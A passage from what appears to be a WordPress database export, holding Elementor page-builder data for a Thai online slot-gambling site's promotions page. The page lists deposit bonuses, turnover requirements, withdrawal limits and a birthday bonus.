\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong> \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e27\\u0e31\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 (\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(469,80,'_elementor_edit_mode','builder'),(470,80,'_elementor_template_type','wp-page'),(471,80,'_elementor_version','3.32.5'),(472,80,'_elementor_pro_version','3.32.3'),(473,80,'_wp_page_template','default'),(474,80,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(475,80,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet 